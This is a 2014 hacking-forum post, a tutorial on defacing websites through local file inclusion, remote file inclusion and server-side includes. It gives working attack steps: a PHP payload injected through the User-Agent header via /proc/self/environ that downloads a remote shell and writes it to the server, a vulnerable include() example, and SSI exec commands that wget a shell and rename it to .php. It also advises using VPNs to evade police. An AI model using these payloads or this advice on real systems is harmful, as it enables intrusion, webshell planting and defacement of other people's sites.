www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
Tutorial Advanced Exploitation Techniques EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
Tutorial Advanced Exploitation Techniques EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
Tutorial Advanced Exploitation Techniques EmptyTue Apr 11, 2017 1:35 am by Group Hackers

November 2024

MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
252627282930 

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    Tutorial Advanced Exploitation Techniques

    Admin
    Admin
    Admin


    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 32
    Location : Pakistan

    Tutorial Advanced Exploitation Techniques Empty Tutorial Advanced Exploitation Techniques

    Post by Admin Thu Dec 25, 2014 3:46 pm

    Table of Contents
    Chapter I: Recon
    Chapter II: Getting the tools ready
    Chapter III: Getting your ass safe
    Chapter IV: Local File Inclusion
    Chapter V: Remote File Inclusion
    Chapter VI: Server Side Inclusion
    Chapter VII: Last word


    Chapter I: Recon

    Allright imagine this: "You are a NAVY seal, ready to strike Osama binladens House. But.... you havent prepared any strategy, plan, you havent found any flaw in the house its security. I bet you could tell me whats going to happen with the mission. COMPLETE FAILURE.
    Always plan, plan and dont forget... Plan. Let me explain you briefly what i mean with planning. The art of planning is basicly gathering information about your target. The information i always collect is: The OS, The CMS it is running, Are there any open ports?. Then after i have gathered that information i usually perform a paros Proxy scan on the site. Basicly all it does is, scan the site for vulnerabilities and make up an fancy report.
    If you want to download and use Paros for yourself be my guest.
    Allright now.. I assume that you have the following information:
    Any idea which ports are open on the target, The Operating System, The possible CMS the server is running (not necessary) and Your Paros Proxy report. Thats basicly all the information you need to determine which kind of attack you are going to use against the target.

    Chapter II: Tools

    Like every job there is, you will need tools.
    We hackers have a very small ammount of tools necessarry to complete our main goal. Which is exploiting that one website you wish to deface.
    Allright troughout this tutorial we are not going to use fancy tools etc.
    Instead we will be using these key tools: -Your brain, -Your hands and last but certainly not least.... Firefox.
    Make sure that you have either http headers or tamperdata installed as a firefox plugin.


    Chapter III: Safey

    In a world, where people hack targets you have another group of people. I bet you feel this comming.... The police.
    Trust me on this one, once you start hacking big sites. The police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basicly its a server you can connect to, which will intercept all your packets and make them go trough their server. All that it does is hide your real IP.
    Some free VPN's are: Cyberghost, VPNreactor and nProx.
    Once you move on to the bigger sites, i would highly recommend to get a paid VPN like vpntunnel or anonine.


    Chapter IV: Local File Inclusion

    Most of you have probally heard about this method once or twice. This is the so called "LFI" exploitation method.
    LFI can occur on sites with this extension:

    Code:

    [You must be registered and logged in to see this link.]


    When you perform an LFI attack you attempt to bypass the server directories to end up into the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless you say? WELL i couldnt disagree more with you on that one. You see on the first sight proc/self/environ seems like a bunch of shit.
    It will look something like this:

    Code:

    TMPDIR=/var/chroot/home/content/23/8340423/tmpPHPRC=/var/chroot/home/content/23/8340423/htmlTEMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_CHILDREN=0PATH=/usr/local/bin:/usr/bin:/binPWD=/web/cgi-binSHLVL=0RAILS_ENV=productionSPI=TRUETMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_MAX_REQUESTS=100000


    But there is something really cool we can do with this.
    We can spawn a shell trough this directory...
    Now i got your attention right? Good. To spawn a shell we simply open up our tamper data en reload the page while we are tampering.
    Once you see a little message pop up, click tamper data.
    Now we will notice a little Useragent tab.
    In there we will type the following code:

    PHP Code:


    <?php $file = fopen("shellname.php","w+"); $stream = fopen ("Link you shell here/shell.txt", "r"); while(!feof($stream)) {
    $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>



    Thanks to Legit for that code. Works beter then mine with system();
    Now once you have done that, click the submit button and your shell should be spawned Smile. To check if it worked go to This link is hidden from you. If you want to see it you have to [You must be registered and logged in to see this link.] on this board. and voila.


    Chapter V: Remote File Inclusion

    Im not very glad to say, but this is one of the good exploit methods that has died. There are almost no websites who have this vulnerability. Thats because its so easy to fix and yet so harmfull.
    I will explain you the so called "RFI" briefly.
    RFI or remote file inclusion is an technique where you exploit the include(); function.
    RFI and LFI are quite similair, there's a catch tho. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
    For an example: a site includes php scripts in an un-protected manner.
    A little bit like this:

    PHP Code:


    <?php
    $color = 'blue';
    if (isset( $_GET['COLOR'] ) )
    $color = $_GET['COLOR'];
    include( $color . '.php' );
    ?>



    Now to exploit this we will execute the following command:

    Code:

    [You must be registered and logged in to see this link.]


    Now you are wondering.. why the hell did he use a .txt shell?
    PHP automaticly transfers .txt > .php. which will result in a nice shell to own/deface the website.

    Chapter VI: Server Side Inclusion

    Okay now we move on to the "harder" methods.
    Server Side Inclusion or SSI is an advanced technique that exploits vulnerabilities in the HTML code.
    All that this means is that you inject script into html-forms and that it will result in spawning a shell or doing something worse.
    SSI can only be performed in a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is a something else to keep in mind. SSI will also work in normal pages, but ONLY when the input is not filtered.
    For an example we have a little textbox which is vulnerable to SSI.
    We can do some nice little commands here for an example:

    Code:

    < !--#exec cmd="cd \admin\dir">
    < !--#exec cmd="wget [You must be registered and logged in to see this link.] -->


    i will explain these 2 commands to you for a moment.
    The first command lets you browse directories that you cant acces without administrator priveleges. The second command lets you download your shell on the website (This is the shit we are interested in).
    Then the only thing left for you to do is to locate your file by executing this command:

    Code:

    < !--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
    This basicly finds your shell.txt, converts it to PHP and places it in the directory of your choice.


    Chapter VII: Last things

    Well this was my little tutorial regarding uncommon forms of attack.
    I hope you have learned something from it and i hope to hear your personal experiences with this.
    If this helped you, please leave any form of thank you. Its highly apreciated Smile



      Current date/time is Thu Nov 21, 2024 11:42 am